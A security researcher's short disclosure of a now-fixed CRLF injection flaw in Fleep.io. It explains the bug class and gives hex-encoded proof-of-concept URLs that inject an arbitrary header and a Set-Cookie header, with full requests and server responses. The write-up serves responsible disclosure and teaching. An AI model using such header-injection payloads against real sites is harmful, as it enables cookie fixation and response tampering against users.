I offers security consulting services within the space of Penetration Testing , Ethical Hacking , Vulnerability Assessments and Security Code and Configuration Reviews ~

CRLF Injection in Fleep.io

ASSALAM O ALAIKUM !

After so long period, writing a Short Disclosure of the recent vulnerability that I have found in Fleep.io. It has been fixed now. So, I can share it.

What is CR & LF?
Carriage return is from the days of the typewriters, abbreviated as CR which would return to the next line and push the paper up. Line feed (LF) signals the end of the line. Together, this sequence can be referred to as CRLF.

What is CRLF Injection?
When Web application do not properly sanitize user input before using it as an HTTP header value then there should be maximum probability of the existence of Vulnerability CRLF Injection (also called Response Splitting and Header Injection). It allows an attacker to control the remaining headers and body of the response the application and also allow them to create additional responses.


Proof  Of Concept:

Request

https://fleep.io/v/ed1202c85b/assets/fleep/%0A%48%65%61%64%65%72%49%6E%6A%65%63%74%65%64%3A%69%6E%6A%65%63%74%65%64%5F%62%79%5F%41%6C%69%5F%48%61%73%73%61%6E%5F%47%68%6F%72%69
GET /v/ed1202c85b/assets/fleep/%0A%48%65%61%64%65%72%49%6E%6A%65%63%74%65%64%3A%69%6E%6A%65%63%74%65%64%5F%62%79%5F%41%6C%69%5F%48%61%73%73%61%6E%5F%47%68%6F%72%69 HTTP/1.1
Host: fleep.io
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 20 Jan 2016 08:49:12 GMT
Content-Type: text/html
Content-Length: 178
Location: https://fleep.io/v/ed1202c85b/assets/fleep/
HeaderInjected: injected_by_Ali_Hassan_Ghori/
Connection: keep-alive
Expires: Fri, 22 Jan 2016 08:49:12 GMT
Cache-Control: max-age=172800
content-security-policy: default-src 'none'
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: deny







So, here I injected cookie.
Request

https://fleep.io/v/ed1202c85b/assets/fleep/%0A%53%65%74%2D%43%6F%6F%6B%69%65%3A%20%69%6E%6A%65%63%74%65%64%43%6F%6F%6B%69%65%3D%73%65%63%75%72%69%74%79%77%61%6C%6C
GET /v/ed1202c85b/assets/fleep/%0A%53%65%74%2D%43%6F%6F%6B%69%65%3A%20%69%6E%6A%65%63%74%65%64%43%6F%6F%6B%69%65%3D%73%65%63%75%72%69%74%79%77%61%6C%6C HTTP/1.1
Host: fleep.io
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 20 Jan 2016 09:10:17 GMT
Content-Type: text/html
Content-Length: 178
Location: https://fleep.io/v/ed1202c85b/assets/fleep/
Set-Cookie: injectedCookie=securitywall/
Connection: keep-alive
Expires: Fri, 22 Jan 2016 09:10:17 GMT
Cache-Control: max-age=172800
content-security-policy: default-src 'none'
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: deny